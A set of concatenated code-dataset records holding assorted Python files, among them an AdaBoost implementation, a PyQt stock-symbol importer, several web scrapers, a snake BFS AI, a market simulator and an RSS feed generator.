np.sum(self.weights*errors)/len(self.x_train) ##calculate weighted error rate \n if error < 1e-5:\n error = 1e-5 \n self.beta.append((1-error)/error)\n self.weights = [self.weights[index] *0.5 / error if errors[index] else 0.5*weight/(1-error)\n for index,weight in enumerate(self.weights)]\n\n self.weights = [1e-8 if weight < 1e-8 else weight for weight in self.weights]\n self.estimators.append(clf)\n\n # train the data set\n def train(self):\n for i in range(self.n_iteration):\n self.train_one_iteration(i)\n\n #test operation\n def test(self):\n result = []\n for i in range(len(self.x_test)):\n result.append([])\n # 统计不同分类器针对的分类结果\n for index, estimator in enumerate(self.estimators):\n y_test_result = estimator.predict(self.x_test)\n for index2, res in enumerate(result):\n res.append([y_test_result[index2], np.log(1/self.beta[index])])\n #\n final_result = []\n # 投票得出结果 \n for res in result:\n dic = {}\n for r in res:\n if r[0] not in dic: ## 记录每一个分类器对当前test实例的结果\n dic[r[0]] = r[1] \n else:\n dic[r[0]] = dic.get(r[0]) + r[1]\n \n final_result.append(sorted(dic, key=lambda x:dic[x])[-1])\n\n print(float(np.sum(final_result == self.y_test)) / len(self.y_test))\n\n return final_result\n\nfrom utils import loadData\nx_train, x_test, y_train, y_test = loadData()\n\n\n### test for data \nadaboost_estimator = BasicAdaboost(base_estimator=tree.DecisionTreeClassifier, x_train=x_train, y_train=y_train, x_test=x_test, y_test=y_test)\n\nadaboost_estimator.train()\n\nadaboost_estimator.test()\n","sub_path":"BasicAdaboost.py","file_name":"BasicAdaboost.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"105127148","text":"# coding:utf-8\r\n\r\n\r\nimport xlrd\r\nfrom PyQt4 import QtGui, QtCore\r\n\r\nfrom assetAllocation.stockAllocation.customThreadClass import SomeStockFinanceThread\r\nfrom uiFile import Ui_importStock\r\n\r\n\r\nclass ImportSymbol(QtGui.QDialog, Ui_importStock):\r\n \"\"\"\r\n 
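# Looking back at BasicAdaboost above: with weighted error e it stores
# beta = (1 - e) / e and votes each weak learner with log(1 / beta)
# = log(e / (1 - e)), which is negative whenever e < 0.5 and so inverts
# the vote ordering. Classic AdaBoost.M1 takes beta = e / (1 - e), giving
#
#   alpha = log(1 / beta) = log((1 - e) / e) > 0   for e < 0.5
#
# so that a learner beating chance gets a positive say in the vote.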
将文件中的股票代码导入系统\r\n \"\"\"\r\n\r\n def __init__(self, parent=None):\r\n super(ImportSymbol, self).__init__(parent)\r\n self.parent = parent\r\n self.setupUi(self)\r\n # 导入的股票代码\r\n self.importSymbolList = []\r\n # 导入的文件类型\r\n self.fileType = None\r\n # 初始化一个线程,用于获取股票的财务数据\r\n self.financeThread = SomeStockFinanceThread(self)\r\n self.connect(self.financeThread, QtCore.SIGNAL('started()'), self.financeStartAction)\r\n self.connect(self.financeThread, QtCore.SIGNAL('finished(int, QString)'), self.financeFinishAction)\r\n # 设置样式表\r\n self.filePath.setPlaceholderText(u'股票代码路径')\r\n\r\n self.connect(self.findFile_button, QtCore.SIGNAL('clicked()'),\r\n self.openFileDialog)\r\n self.connect(self.ok_button, QtCore.SIGNAL('clicked()'),\r\n self.importAction)\r\n self.connect(self.cancel_button, QtCore.SIGNAL('clicked()'),\r\n self.cancelAction)\r\n\r\n def openFileDialog(self):\r\n \"\"\"\r\n 打开文件对话框\r\n :return:\r\n \"\"\"\r\n fd = QtGui.QFileDialog(self, QtCore.QString('open file'), '', '')\r\n fd.resize(500, 300)\r\n fd.setFilter(\"Excel(*.xls *.xlsx);;Text(*.txt)\")\r\n fd.setViewMode(QtGui.QFileDialog.List)\r\n\r\n if fd.exec_() == QtGui.QDialog.Accepted:\r\n self.pathName = r'%s' % fd.selectedFiles()[0]\r\n self.filePath.setText(self.pathName)\r\n self.optionConfig(self.pathName)\r\n else:\r\n self.filePath.clear()\r\n\r\n def optionConfig(self, pathName):\r\n \"\"\"\r\n 判断是什么格式,使得另外一种格式无效\r\n :param pathName: 文件的路径和文件名\r\n \"\"\"\r\n importFileType = pathName.split('.')[-1]\r\n if importFileType in ['xls', 'xlsx']:\r\n self.startRow_txt.setEnabled(False)\r\n self.endRow_txt.setEnabled(False)\r\n self.delimiter.setEnabled(False)\r\n self.startRow_xls.setEnabled(True)\r\n self.endRow_xls.setEnabled(True)\r\n self.column.setEnabled(True)\r\n elif importFileType == 'txt':\r\n self.startRow_xls.setEnabled(False)\r\n self.endRow_xls.setEnabled(False)\r\n self.column.setEnabled(False)\r\n self.startRow_txt.setEnabled(True)\r\n self.endRow_txt.setEnabled(True)\r\n self.delimiter.setEnabled(True)\r\n self.fileType = importFileType\r\n\r\n def importAction(self):\r\n \"\"\"\r\n 点击确定后开始导入股票代码\r\n :return:\r\n \"\"\"\r\n if self.fileType in ['xls', 'xlsx']:\r\n startRow = self.startRow_xls.value()\r\n endRow = self.endRow_xls.value()\r\n column = self.column.value()\r\n self.getCodeFromExcel(startRow, endRow, column)\r\n elif self.fileType == 'txt':\r\n startRow = self.startRow_txt.value()\r\n endRow = self.endRow_txt.value()\r\n delimiter = str(self.delimiter.text()) # 有可能因为分隔符的格式出错误\r\n self.getCodeFromText(startRow, endRow, delimiter)\r\n\r\n def getCodeFromExcel(self, startRow, endRow, column):\r\n \"\"\"\r\n 获得导入的代码\r\n :param startRow: 起始行(1开始)\r\n :param endRow: 终止行\r\n :param column: 所在列\r\n :return:\r\n \"\"\"\r\n try:\r\n book = xlrd.open_workbook(self.pathName) # 打开要读的Excel文件\r\n except Exception as e:\r\n QtGui.QMessageBox.warning(self, u'读取错误', u'错误信息为:%s' % str(e))\r\n return False\r\n sheet = book.sheet_by_index(0)\r\n try:\r\n if endRow == 0:\r\n rowList = range(startRow - 1, sheet.nrows)\r\n elif endRow < 0:\r\n rowList = range(startRow - 1, sheet.nrows + endRow)\r\n else:\r\n rowList = range(startRow - 1, endRow)\r\n column -= 1\r\n for row in rowList:\r\n # 读取内容,并过滤\r\n content = str(sheet.row_values(row)[column]).lower()\r\n content = content.replace('sz', '').replace('sh', '').replace('.', '').replace(' ', '')\r\n if content.isdigit() and len(content) == 6:\r\n self.importSymbolList.append(str(content))\r\n except Exception as e:\r\n QtGui.QMessageBox.warning(self, u'读取错误', 
u'错误信息为:%s' % str(e))\r\n return False\r\n\r\n if not self.importSymbolList:\r\n return\r\n # 股票代码(不一定是有效代码,无效代码不能查到数据)\r\n self.getStockFinanceData(self.importSymbolList)\r\n\r\n def getCodeFromText(self, startRow, endRow, delimiter):\r\n \"\"\"\r\n 从txt文件中读取数据\r\n :param startRow:\r\n :param endRow:\r\n :param delimiter:\r\n :return:\r\n \"\"\"\r\n try:\r\n f = open(self.pathName)\r\n except Exception as e:\r\n QtGui.QMessageBox.warning(self, u'读取错误', u'错误信息为:%s' % str(e))\r\n return False\r\n lines = f.readlines()\r\n f.close()\r\n if endRow == 0:\r\n rowList = lines[startRow - 1:]\r\n else:\r\n rowList = lines[startRow - 1:endRow]\r\n for row in rowList:\r\n for code in row.split(delimiter):\r\n content = code.replace('sz', '').replace('sh', '').replace('.', '').replace(' ', '')\r\n if content.isdigit() and len(content) == 6:\r\n self.importSymbolList.append(str(content))\r\n\r\n if not self.importSymbolList:\r\n return\r\n # 股票代码(不一定是有效代码,无效代码不能查到数据)\r\n self.getStockFinanceData(self.importSymbolList)\r\n\r\n def getStockFinanceData(self, symbolList):\r\n currentIndustryType = self.parent.envContext['currentIndustryType']\r\n if not currentIndustryType:\r\n QtGui.QMessageBox.warning(self, u'查询错误', u'行业信息还未初始化')\r\n return\r\n\r\n tableSymbolList = self.parent.envContext['financeIndexTable'].getTableSymbolList()\r\n symbolList = list(set(symbolList) - set(tableSymbolList))\r\n if not symbolList:\r\n return\r\n ifSelect_check = self.ifSelect_check.isChecked()\r\n addConfigStock_check = self.addConfigStock_check.isChecked()\r\n self.financeThread.startThread(currentIndustryType, symbolList, self.parent.envContext['financeIndexTable'],\r\n toTableObj=self.parent.envContext['regressionTable'],\r\n ifSelect_check=ifSelect_check, addConfigStock_check=addConfigStock_check)\r\n\r\n def financeStartAction(self):\r\n self.ok_button.setEnabled(False)\r\n\r\n def financeFinishAction(self, status, message):\r\n self.ok_button.setEnabled(True)\r\n if status == 201:\r\n self.inputInfo(message)\r\n self.parent.envContext['financeIndexTable'].model.refrushModel()\r\n self.parent.envContext['regressionTable'].model.refrushModel()\r\n else:\r\n QtGui.QMessageBox.warning(self, u'查询错误', u'未找到相关股票代码的财务信息\\n异常代码为%s' % status)\r\n\r\n def inputInfo(self, info):\r\n \"\"\"\r\n 输出命令\r\n :param info:\r\n :return:None\r\n \"\"\"\r\n info = QtCore.QString(info)\r\n self.resultInput.append(info)\r\n\r\n def cancelAction(self):\r\n \"\"\"\r\n 关闭按钮的操作\r\n :return:None\r\n \"\"\"\r\n self.accept()\r\n","sub_path":"assetAllocation/stockAllocation/importSymbol.py","file_name":"importSymbol.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"269470455","text":"# -*- coding: utf-8 -*-\nimport pprint, scrapy\n\nfrom sxsbz.items import SxsbzItem, ContentItem\n\n\nclass Lashu8AllSpider(scrapy.Spider):\n\tname = \"lashu8_all\"\n\tallowed_domains = [\"www.lashu8.com\"]\n\tstart_urls = ['http://www.lashu8.com/']\n\n\tdef parse(self, response):\n\t\ttop_novels = response.xpath(\"\"\"//div[@class=\"m1l\"]/ul/li\"\"\")\n\t\tcategory = \"{}\".format(response.xpath(\"\"\"//div[@class=\"m1l\"]/h2/span/text()\"\"\").extract_first())\n\t\tfor novel in top_novels:\n\t\t\titem = SxsbzItem()\n\t\t\titem['response_url'] = response.url\n\t\t\titem['title'] = novel.xpath(\"\"\"./a\"\"\")[1].xpath(\"\"\"./text()\"\"\").extract_first()\n\t\t\titem['thumbnail_url'] = \"http://{}{}\".format(self.allowed_domains[0], 
novel.xpath(\"\"\"./a\"\"\")[0].xpath(\"\"\"./img/@src\"\"\").extract_first())\n\t\t\titem['article_url'] = \"http://{}{}\".format(self.allowed_domains[0], novel.xpath(\"\"\"./a\"\"\")[1].xpath(\"\"\"./@href\"\"\").extract_first())\n\t\t\titem['articles'] = [category]\n\t\t\tyield scrapy.Request(item['article_url'], meta={'item': item}, callback=self.parse_article)\n\t\t\t\n\t\t\tbreak\n\t\tyield item\n\n\n\tdef parse_article(self, response):\n\t\titem = response.meta['item']\n\t\tchapters = response.xpath(\"\"\"//div[@class=\"mulu\"]/ul/li\"\"\")\n\t\tchapters_dict = {}\n\t\tfor index, chapter in enumerate(chapters):\n\t\t\tchapter_url = \"http://{}{}\".format(self.allowed_domains[0], chapter.xpath(\"\"\"./a/@href\"\"\").extract_first())\n\t\t\tchapters_dict[str(index)] = ContentItem()\n\t\t\tchapters_dict[str(index)]['chapter'] = [\"
{}\".format(\" \".join(chapter.xpath(\"\"\"./a//text()\"\"\").extract()))]\n\t\t\tchapters_dict[str(index)]['contents'] = []\n\t\t\tyield scrapy.Request(chapter_url, meta={'data': chapters_dict, 'index': str(index)}, callback=self.parse_chapter)\n\t\t\tbreak\n\t\tprint(\"XXXX\", chapters_dict)\n\t\tfor index, key in enumerate(chapters_dict):\n\t\t\tprint(index)\n\t\t\tprint(chapters_dict[str(index)]['chapter'])\n\t\t\tprint(chapters_dict[str(index)]['contents'])\n\t\t\titem['articles'].extend(chapters_dict[str(index)]['chapter'])\n\t\t\titem['articles'].extend(chapters_dict[str(index)]['contents'])\n\n\t\treturn item\n\n\n\tdef parse_chapter(self, response):\n\t\tdata = response.meta['data']\n\t\tindex = response.meta['index']\n\t\tdata[index]['contents'].extend(response.xpath(\"\"\"//div[@class=\"mcc\"]//text()\"\"\").extract())\n\n\t\treturn data","sub_path":"sxsbz/sxsbz/spiders/lashu8_all.py","file_name":"lashu8_all.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"323897264","text":"from game import Model, Direction, Environment\nfrom collections import deque\n\nROUTE_MARK = -3\n\nclass AIBFSModel(Model):\n def __init__(self, logger = None):\n super().__init__(logger)\n self.route = []\n\n def route_compute(self, board, snake_head, food):\n find = False\n queue = deque([snake_head])\n\n parent_map = {}\n\n while queue:\n cur_pos = queue.popleft()\n cx, cy = cur_pos\n\n for i, (dx, dy) in enumerate(Direction.MOVE):\n tx, ty = cx + dx, cy + dy\n tmp_pos = (tx, ty)\n if board[tx, ty] == Environment.FOOD:\n parent_map[food] = (cur_pos, i)\n find = True\n break\n elif board[tx, ty] == Environment.EMPTY:\n board[tx, ty] = ROUTE_MARK\n queue.append(tmp_pos)\n parent_map[tmp_pos] = (cur_pos, i)\n\n if find:\n cur_pos = food\n while cur_pos != snake_head:\n cur_pos, d = parent_map[cur_pos]\n self.route.append(d)\n\n return find\n\n def move(self, board, snake_head, food):\n if self.route:\n return self.route.pop()\n elif self.route_compute(board, snake_head, food):\n return self.route.pop()\n else:\n return Direction.UP\n\n def reset(self):\n pass\n","sub_path":"ai_bfs_model.py","file_name":"ai_bfs_model.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"350475019","text":"\"\"\"MC2-P1: Market simulator.\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport datetime as dt\nimport os\nfrom util import get_data, plot_data\n\ndef compute_portvals(orders_file = \"./orders/orders.csv\", start_val = 1000000):\n # this is the function the autograder will call to test your code\n df = pd.read_csv(orders_file)\n arr = df.as_matrix() #Store orders in np array\n start_date = arr[0,0]\n end_date = arr[-1,0]\n symbols = f7(arr[:,1])\n prices = get_data(symbols, pd.date_range(start_date, end_date))\n prices = prices[symbols] # remove SPY\n daily_rets = compute_daily_returns(prices)\n\n dates = daily_rets.index.values\n temp = pd.DataFrame(columns=['Value'], index=dates)\n temp.loc[start_date] = pd.Series({'Value': start_val})\n prev_date = start_date\n\n temp = help_function(dates,arr,prices,daily_rets, start_val, temp)\n return temp\n\ndef help_function(dates, arr, prices, daily_rets, start_val, temp):\n for date in dates:\n date = dt.datetime.utcfromtimestamp(date.tolist()/1e9) #convert from datetime64 to datetime\n for row in arr:\n ti = dt.datetime.strptime(row[0], \"%Y-%m-%d\") #convert string to 
datetime\n if ti < date:\n if row[2] == 'BUY':\n start_val = start_val + daily_rets.ix[date.strftime(\"%Y-%m-%d\"), row[1]] * prices.ix[prev_date, row[1]] * row[3]\n else:\n start_val = start_val - daily_rets.ix[date.strftime(\"%Y-%m-%d\"), row[1]] * prices.ix[prev_date, row[1]] * row[3]\n temp.loc[date] = pd.Series({'Value': int(start_val)})\n prev_date = date\n return temp\n\ndef compute_daily_returns(df):\n \"\"\"Compute and return the daily return values.\"\"\"\n daily_returns = (df / df.shift(1)) -1\n daily_returns.ix[0] = 0 # Note: Returned DataFrame must have the same number of rows\n return daily_returns\n\ndef f7(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\ndef get_portfolio_value(prices, allocs, start_val):\n # Plot adjusted closing prices for the 4 equities\n #plot_data(prices)\n # Normalize the prices according to the first day. The first row for each stock should have a value of 1.0 at this point\n normal_prices = normalize_data(prices)\n # Multiply each column by the allocation to the corresponding equity.\n normal_allocs_prices = normal_prices * allocs\n # Multiply these normalized allocations by starting value of overall portfolio, to get position values\n adj_position_prices = normal_allocs_prices * start_val\n #Sum each row (i.e. all position values for each day). That is your daily portfolio value.\n daily_port_value = adj_position_prices.sum(axis=1)\n return daily_port_value\n\ndef get_portfolio_stats(port_val, daily_rf, samples_per_year):\n daily_rets = compute_daily_returns(port_val)\n daily_rets = daily_rets[1:]\n cr = (port_val[-1] / port_val[0]) - 1\n adr = daily_rets.mean()\n sddr = daily_rets.std()\n sr = 252**(1.0/2) * (adr - daily_rf) / sddr\n return cr, adr, sddr, sr\n\ndef normalize_data(df):\n return df/ df.ix[0,:]\n\ndef test_code():\n of = \"./orders/orders-short.csv\"\n sv = 1000000\n\n # Process orders\n portvals = compute_portvals(orders_file = of, start_val = sv)\n if isinstance(portvals, pd.DataFrame):\n portvals = portvals[portvals.columns[0]] # just get the first column\n else:\n \"warning, code did not return a DataFrame\"\n \n dates = portvals.index.values\n start_date = dt.datetime.utcfromtimestamp(dates[0].tolist()/1e9).strftime(\"%Y-%m-%d\")\n end_date = dt.datetime.utcfromtimestamp(dates[-1].tolist()/1e9).strftime(\"%Y-%m-%d\")\n daily_rf = 0.0\n samples_per_year = 252.0\n cum_ret, avg_daily_ret, std_daily_ret, sharpe_ratio = get_portfolio_stats(portvals, daily_rf, samples_per_year)\n #cum_ret_SPY, avg_daily_ret_SPY, std_daily_ret_SPY, sharpe_ratio_SPY = [0.2,0.01,0.02,1.5]\n\n # Compare portfolio against $SPX\n print (\"Date Range: {} to {}\".format(start_date, end_date))\n print ()\n print (\"Sharpe Ratio of Fund: {}\".format(sharpe_ratio))\n print (\"Cumulative Return of Fund: {}\".format(cum_ret))\n print (\"Standard Deviation of Fund: {}\".format(std_daily_ret))\n print (\"Average Daily Return of Fund: {}\".format(avg_daily_ret))\n print (\"Final Portfolio Value: {}\".format(portvals[-1]))\n\nif __name__ == \"__main__\":\n test_code()\n","sub_path":"mc2_p1/marketsim.py","file_name":"marketsim.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"60003747","text":"# coding:utf-8\r\n\r\n__author__ = 'ChenKai'\r\n\r\nfrom feedgen.feed import FeedGenerator\r\n\r\nfrom project.models import Post\r\nfrom project import db\r\nimport os\r\nimport pytz\r\nfrom datetime import 
from datetime import datetime\r\nimport time\r\n\r\nfilename = 'project/static/rss/atom.xml'\r\n\r\n\r\ndef CDATA(text):\r\n    return '<![CDATA[%s]]>' % text\r\n\r\n\r\n# Generate atom.xml for RSS\r\ndef genAtom(filename):\r\n\r\n    if os.path.exists(filename):\r\n        os.remove(filename)\r\n\r\n    fg = FeedGenerator()\r\n    fg.title(\"BONFY\")\r\n    fg.link(href='/atom.xml', rel='self')\r\n    fg.link(href='http://www.bonfy.im/')\r\n\r\n    fg.id('http://www.bonfy.im/')\r\n    fg.author({\r\n        'name': 'BONFY',\r\n        'email': 'bonfygithub@163.com'\r\n    })\r\n\r\n    posts = Post.query.order_by('id desc').limit(10)\r\n\r\n    for post in posts:\r\n        fe = fg.add_entry()\r\n        fe.title(post.title)\r\n        fe.link(href='www.bonfy.im/blog/detail/%d' % int(post.id), rel='self')\r\n\r\n        local = pytz.timezone(\"Asia/Shanghai\")\r\n        local_dt = local.localize(post.insert_dt, is_dst=None)\r\n        utc_dt = local_dt.astimezone(pytz.utc)\r\n\r\n        fe.published(utc_dt)\r\n        fe.id(post.title)\r\n        fe.content(post.content_html, type='html')\r\n\r\n    fg.atom_file(filename)\r\n\r\n\r\n# Dump Hexo .md files into the database\r\n# All .md files must be placed in the static/md folder first\r\ndef initMd(filePath):\r\n    for file_name in os.listdir(filePath):\r\n        with open(os.path.join(filePath, file_name), 'r') as f:\r\n            lines = f.readlines()\r\n\r\n        title = str(lines[0]).strip()[len('title: '):]\r\n        user_id = 1\r\n        insert_date = datetime.strptime(str(lines[1]).strip()[len('date: '):].replace('/', '-'), \"%Y-%m-%d %H:%M:%S\")\r\n        # tag_id = 1 # tag_id defaults to 1 (随便说说)\r\n        content = ''.join(lines[3:])\r\n\r\n        new_message = Post(\r\n            title,\r\n            content,\r\n            user_id,\r\n            insert_dt=insert_date\r\n        )\r\n        db.session.add(new_message)\r\n        db.session.commit()\r\n\r\n\r\nif __name__ == '__main__':\r\n    # genAtom()\r\n    initMd('project/static/md')","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"613430887","text":"\"\"\"Project Euler Problem 55\"\"\"\n\n\ndef problem_55() -> int:\n    \"\"\"Lychrel numbers\"\"\"\n    lychrel_number_list = list()\n    for i in range(1, 10000):\n        tmp_num = i\n        loop_cnt = 1\n        while loop_cnt < 50:\n            tmp_num = get_sum_reverse_number(tmp_num)\n            if judge_palindrome_number(tmp_num):\n                break\n            loop_cnt += 1\n        if loop_cnt == 50:\n            lychrel_number_list.append(i)\n    return len(lychrel_number_list)\n\n\ndef get_sum_reverse_number(num: int) -> int:\n    \"\"\"return {num} + reverse {num}\"\"\"\n    return num + int(str(num)[::-1])\n\n\ndef judge_palindrome_number(num: int) -> bool:\n    \"\"\"return True(equal palindrome) or False(not palindrome)\"\"\"\n    return str(num) == str(num)[::-1]\n\n\nif __name__ == \"__main__\":\n    print(problem_55())\n","sub_path":"sampleproject/www/Project_Euler/problem051_100/problem055.py","file_name":"problem055.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"618543993","text":"# coding=utf-8\n\nimport HTMLParser\nimport requests\nimport time\n\ndef download(URL):\n    headers = {}\n    headers['User-Agent'] = 'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0'\n    headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'\n    headers['Accept-Language'] = 'en-US,en;q=0.5'\n    #headers['Accept-Encoding'] = 'gzip, deflate'\n    headers['DNT'] = '1'\n    #headers['Connection'] = 'keep-alive'\n    headers['Cache-Control'] = 'max-age=0'\n\n    h = HTMLParser.HTMLParser()\n    URL = h.unescape(URL)\n\n    try:\n        r = requests.get(URL, headers=headers)\n        time.sleep(5)\n        if
r.status_code == 200:\n return r.content\n except:\n time.sleep(5)\n return('Error')\n","sub_path":"downloadPage.py","file_name":"downloadPage.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"391661016","text":"#!/usr/bin/env python\n__author__ = 'Jing Conan Wang, Boston University, wangjing@bu.edu'\n\nfrom librl.policies import BoltzmanPolicy, PolicyFeatureModule\nfrom librlmod.environments.maze.endlessmaze import EndlessMazeBinaryAction\nfrom librlmod.environments.endlessGridWorld import EndlessGridWorld\nfrom librlmod.experiments import *\nfrom librl.learners import *\nfrom librl.agents.actorcriticagent import ActorCriticAgent\nfrom librlmod.graph.GirdWorldDisplay import gridWorldWindows\n\n# import global parameters\nfrom problem_settings import gridSize, unsafeStates, iniState, goalStates, TP, DF, senRange, rewards\nfrom problem_settings import iniTheta, T\n\n# Create environment\n# Add unsafe states\nenvMatrix = zeros(gridSize)\nenvMatrix[zip(*goalStates)] = EndlessMazeBinaryAction.SOURCE_FLAG\nenv = EndlessMazeBinaryAction(envMatrix, iniState)\n\n# Create task\ntask = EndlessGridWorld(env, senRange, rewards)\n\n\nsessionNumber = 1000\nsessionSize = 100\n\nfeaDim = 13\nnumActions = 2\n\npolicy = BoltzmanPolicy(numActions, T, iniTheta)\nmodule = PolicyFeatureModule(policy, 'policywrapper')\nlearner = HessianLSTDLearner(hessianlearningrate=1,\n module=module,\n cssinitial=0.1,\n cssdecay=1000,\n assinitial=0.01,\n assdecay=1000, # ass means actor steps size\n rdecay=0.95,\n maxcriticnorm=10000, # maximum critic norm\n tracestepsize=0.9, # stepsize of trace\n parambound = None\n )\n\nlearner.minHessianSampleNumber = 10\nlearner.actorUpdateThreshold = 10\nagent = ActorCriticAgent(learner, sdim=feaDim*numActions, adim=1, batch=True)\nexperiment = GraphSessionExperiment(task, agent, policy=policy, batch=True)\n\nGridWorld=gridWorldWindows(gridSize[0],gridSize[1],UnitSize=50,grid=rewards)\n\ntry:\n experiment.doSessionsAndPrint(sessionNumber=sessionNumber,\n sessionSize=sessionSize,\n GraphUnit=GridWorld)\nexcept KeyboardInterrupt:\n pass\n","sub_path":"examples/endlessmaze/hessionexample.py","file_name":"hessionexample.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"384334074","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nglobal link_flag\nlink_flag = ''\ndef getLink(url, page):\n global link_flag\n res = requests.get(url)\n soup = bs(res.content, \"html5lib\")\n products = soup.findAll('div', attrs={'class': 'listInner'})\n if len(products) == 0:\n return 0\n if page == 1:\n link_flag = products[0].find('a').get('href')\n\n with open('links.txt', 'a+') as f:\n for product in products:\n link = product.find('a').get('href')\n if page != 1 and link == link_flag:\n return 0\n f.write('http://zozo.jp' + link)\n f.write('\\n')\n return 1\n\ndef getFirstLinks(url):\n first_links = []\n res = requests.get(url)\n soup = bs(res.content, \"html5lib\")\n parts = soup.findAll('dl', attrs={'class': 'textListBlock clearfix'})\n for part in parts:\n links = part.findAll('a')\n for link in links:\n first_links.append('http://zozo.jp' + link['href'])\n return first_links\n\nif __name__ == '__main__':\n url = 'http://zozo.jp/brand/default.html?c=SwitchType&ts=0'\n first_links = getFirstLinks(url)\n for first_link in first_links:\n page = 1\n flag = 1\n while flag != 0:\n url = first_link + 
'?pno=' + str(page)\n            try_time = 3\n            while try_time != 0:\n                try:\n                    flag = getLink(url, page)\n                    try_time = 0\n                except:\n                    try_time -= 1\n            page += 1\n            print(url)\n","sub_path":"zozo_jp/getLinks.py","file_name":"getLinks.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"468669344","text":"'''\nGets the number of days until Texas's next scheduled execution\n'''\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\nclass Offender_info():\n    scheduled_execution = \"\"\n    time_to_scheduled_execution = \"\"\n    last_name = \"\"\n    first_name = \"\"\n    TDCJ_number = \"\"\n    date_of_birth = \"\"\n    race = \"\"\n    date_received = \"\"\n    county = \"\"\n    link_to_detailed_info = \"\"\n\n    def __str__(self):\n        return (\"Last name: {}\".format(self.last_name)+ \"\\n\" +\n            \"First name: {}\".format(self.first_name)+ \"\\n\" +\n            \"Scheduled execution: {}\".format(self.scheduled_execution)+ \"\\n\" +\n            \"Time to scheduled execution: {}\".format(self.time_to_scheduled_execution) + \"\\n\" +\n            \"TDCJ_number: {}\".format(self.TDCJ_number)+ \"\\n\" +\n            \"Date of birth: {}\".format(self.date_of_birth)+ \"\\n\" +\n            \"Race: {}\".format(self.race)+ \"\\n\" +\n            \"Date received: {}\".format(self.date_received)+ \"\\n\" +\n            \"County: {}\".format(self.county) +\"\\n\" + \n            \"Link to more detailed info: {}\".format(self.link_to_detailed_info) + \"\\n\")\n\n\ndef get_scheduled_executions_info(url):\n\n    r = requests.get(url)\n    soup = BeautifulSoup(r.text, 'html.parser')\n\n    results = soup.find_all('table', attrs={'class' : 'tdcj_table indent'})[0].find_all('td')\n    scheduled_executions_info = [] # stores all scheduled executions info\n\n    for i in range(7): # slicing every 9 elements for 7 offenders; still in html format\n        scheduled_executions_info.append(results[i*9:(i*9)+9])\n\n    for info_in_td in scheduled_executions_info: # replacing each element into appropriate text and link\n        for index, info in enumerate(info_in_td):\n            if index == 1:\n                info_in_td[index] = \"https://www.tdcj.state.tx.us/death_row/\" + (info_in_td[index].find_all('a', href = True)[0]['href'])\n            else:\n                info_in_td[index] = info_in_td[index].text\n    \n    offender_list = []\n\n    for info in scheduled_executions_info:\n        offender = Offender_info()\n        offender.scheduled_execution = info[0]\n        offender.time_to_scheduled_execution = calculate_time_to_execution_date(info[0])\n        offender.last_name = info[2]\n        offender.first_name = info[3]\n        offender.TDCJ_number = info[4]\n        offender.date_of_birth = info[5]\n        offender.race = info[6]\n        offender.date_received = info[7]\n        offender.county = info[8]\n        offender.link_to_detailed_info = info[1]\n        offender_list.append(offender)\n\n    return offender_list\n\ndef calculate_time_to_execution_date(date):\n    # Time to next execution calculation\n    #print(\"date is: \",date)\n    next_execution = list(map(int, date.split(\"/\")))\n    return datetime(next_execution[2], next_execution[0], next_execution[1]) - datetime.now()\n    \nif __name__ == '__main__':\n\n    url = \"https://www.tdcj.state.tx.us/death_row/dr_scheduled_executions.html\"\n    executions_info = get_scheduled_executions_info(url)\n    for i in range(len(executions_info)):\n        print(\"Information for offender number {}\".format(i+1))\n        print(executions_info[i])\n\n","sub_path":"death_penalty.py","file_name":"death_penalty.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
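The death_penalty.py record above derives time_to_scheduled_execution by splitting the scraped MM/DD/YYYY string into integers, building a datetime, and subtracting datetime.now(). A minimal standalone sketch of that date arithmetic follows; the function name and the sample date are illustrative only and are not part of the dataset record.

# days_until.py - hypothetical helper mirroring calculate_time_to_execution_date above
from datetime import datetime

def days_until(date_str):
    # "MM/DD/YYYY" -> (month, day, year), same field order the record assumes
    month, day, year = map(int, date_str.split("/"))
    # subtracting two datetimes yields a timedelta; .days is the whole-day count
    return (datetime(year, month, day) - datetime.now()).days

print(days_until("12/31/2030"))  # made-up date; prints the number of days remaining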
